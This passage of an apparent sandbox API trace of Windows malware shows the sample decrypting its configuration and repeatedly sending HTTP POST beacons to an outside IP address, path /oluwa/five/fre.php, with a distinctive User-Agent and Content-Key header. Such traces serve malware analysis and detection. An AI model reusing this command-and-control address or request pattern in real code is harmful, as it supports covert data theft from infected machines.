hHeap=0x6a0000) returned 1 [0264.056] closesocket (s=0x91c) returned 0 [0264.056] GetProcessHeap () returned 0x6a0000 [0264.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0264.056] GetProcessHeap () returned 0x6a0000 [0264.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0264.057] GetProcessHeap () returned 0x6a0000 [0264.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0264.058] GetProcessHeap () returned 0x6a0000 [0264.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0264.059] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1690) returned 0x91c [0264.061] Sleep (dwMilliseconds=0xea60) [0264.062] GetProcessHeap () returned 0x6a0000 [0264.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0264.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.064] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0264.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.070] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0264.082] GetProcessHeap () returned 0x6a0000 [0264.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0264.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.085] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0264.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.113] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0264.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.115] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.115] GetProcessHeap () returned 0x6a0000 [0264.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0264.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.120] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0264.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.121] CryptDestroyKey (hKey=0x6ad020) returned 1 [0264.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.123] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0264.123] GetProcessHeap () returned 0x6a0000 [0264.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0264.124] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.124] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0264.125] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.125] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0264.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.129] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0264.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.131] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0264.131] GetProcessHeap () returned 0x6a0000 [0264.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0264.131] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0264.131] GetProcessHeap () returned 0x6a0000 [0264.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0264.132] GetProcessHeap () returned 0x6a0000 [0264.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0264.132] GetProcessHeap () returned 0x6a0000 [0264.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0264.132] GetProcessHeap () returned 0x6a0000 [0264.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0264.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.134] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0264.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.141] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0264.279] GetProcessHeap () returned 0x6a0000 [0264.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0264.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.280] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0264.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.282] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0264.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.283] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.283] GetProcessHeap () returned 0x6a0000 [0264.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0264.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.285] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0264.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.286] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0264.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.287] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0264.287] GetProcessHeap () returned 0x6a0000 [0264.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0264.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.289] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0264.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.290] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0264.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.292] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0264.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.293] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0264.293] GetProcessHeap () returned 0x6a0000 [0264.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0264.293] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0264.293] GetProcessHeap () returned 0x6a0000 [0264.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0264.293] socket (af=2, type=1, protocol=6) returned 0x920 [0264.293] connect (s=0x920, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0264.329] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0264.329] GetProcessHeap () returned 0x6a0000 [0264.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0264.329] GetProcessHeap () returned 0x6a0000 [0264.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0264.330] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0264.331] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0264.331] GetProcessHeap () returned 0x6a0000 [0264.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9f30 [0264.331] GetProcessHeap () returned 0x6a0000 [0264.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0264.332] GetProcessHeap () returned 0x6a0000 [0264.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0264.332] GetProcessHeap () returned 0x6a0000 [0264.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0264.333] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0264.334] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0264.334] GetProcessHeap () returned 0x6a0000 [0264.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0264.334] GetProcessHeap () returned 0x6a0000 [0264.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0264.335] send (s=0x920, buf=0x6bd460*, len=242, flags=0) returned 242 [0264.335] send (s=0x920, buf=0x6bb998*, len=159, flags=0) returned 159 [0264.335] GetProcessHeap () returned 0x6a0000 [0264.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0264.335] recv (in: s=0x920, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0264.413] GetProcessHeap () returned 0x6a0000 [0264.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0264.413] GetProcessHeap () returned 0x6a0000 [0264.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0264.414] GetProcessHeap () returned 0x6a0000 [0264.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9f30 | out: hHeap=0x6a0000) returned 1 [0264.414] GetProcessHeap () returned 0x6a0000 [0264.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0264.414] closesocket (s=0x920) returned 0 [0264.415] GetProcessHeap () returned 0x6a0000 [0264.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0264.415] GetProcessHeap () returned 0x6a0000 [0264.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0264.416] GetProcessHeap () returned 0x6a0000 [0264.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0264.416] GetProcessHeap () returned 0x6a0000 [0264.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0264.416] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1698) returned 0x920 [0264.419] Sleep (dwMilliseconds=0xea60) [0264.421] GetProcessHeap () returned 0x6a0000 [0264.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0264.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.422] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0264.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.429] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0264.437] GetProcessHeap () returned 0x6a0000 [0264.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0264.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.438] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0264.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.439] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0264.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.442] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.442] GetProcessHeap () returned 0x6a0000 [0264.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0264.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.444] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0264.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.446] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0264.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.447] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0264.447] GetProcessHeap () returned 0x6a0000 [0264.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0264.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.448] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0264.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.449] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0264.450] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.520] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0264.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.521] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0264.521] GetProcessHeap () returned 0x6a0000 [0264.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0264.522] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0264.522] GetProcessHeap () returned 0x6a0000 [0264.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0264.522] GetProcessHeap () returned 0x6a0000 [0264.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0264.523] GetProcessHeap () returned 0x6a0000 [0264.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0264.523] GetProcessHeap () returned 0x6a0000 [0264.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0264.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.526] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0264.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.537] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0264.544] GetProcessHeap () returned 0x6a0000 [0264.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0264.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.546] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0264.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.547] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0264.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.548] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.548] GetProcessHeap () returned 0x6a0000 [0264.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0264.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.551] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0264.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.553] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0264.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0264.554] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0264.554] GetProcessHeap () returned 0x6a0000 [0264.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0264.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.556] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0264.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.557] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0264.557] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.558] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0264.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0264.559] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0264.559] GetProcessHeap () returned 0x6a0000 [0264.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0264.559] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0264.559] GetProcessHeap () returned 0x6a0000 [0264.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0264.559] socket (af=2, type=1, protocol=6) returned 0x924 [0264.559] connect (s=0x924, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0264.586] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0264.586] GetProcessHeap () returned 0x6a0000 [0264.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0264.586] GetProcessHeap () returned 0x6a0000 [0264.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0264.587] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0264.588] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0264.588] GetProcessHeap () returned 0x6a0000 [0264.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b99f0 [0264.588] GetProcessHeap () returned 0x6a0000 [0264.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0264.589] GetProcessHeap () returned 0x6a0000 [0264.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0264.589] GetProcessHeap () returned 0x6a0000 [0264.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0264.590] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0264.590] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0264.590] GetProcessHeap () returned 0x6a0000 [0264.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0264.591] GetProcessHeap () returned 0x6a0000 [0264.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0264.591] send (s=0x924, buf=0x6bd460*, len=242, flags=0) returned 242 [0264.592] send (s=0x924, buf=0x6bb998*, len=159, flags=0) returned 159 [0264.592] GetProcessHeap () returned 0x6a0000 [0264.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0264.592] recv (in: s=0x924, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0264.663] GetProcessHeap () returned 0x6a0000 [0264.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0264.665] GetProcessHeap () returned 0x6a0000 [0264.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0264.666] GetProcessHeap () returned 0x6a0000 [0264.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b99f0 | out: hHeap=0x6a0000) returned 1 [0264.666] GetProcessHeap () returned 0x6a0000 [0264.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0264.667] closesocket (s=0x924) returned 0 [0264.667] GetProcessHeap () returned 0x6a0000 [0264.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0264.667] GetProcessHeap () returned 0x6a0000 [0264.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0264.668] GetProcessHeap () returned 0x6a0000 [0264.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0264.669] GetProcessHeap () returned 0x6a0000 [0264.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0264.669] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: 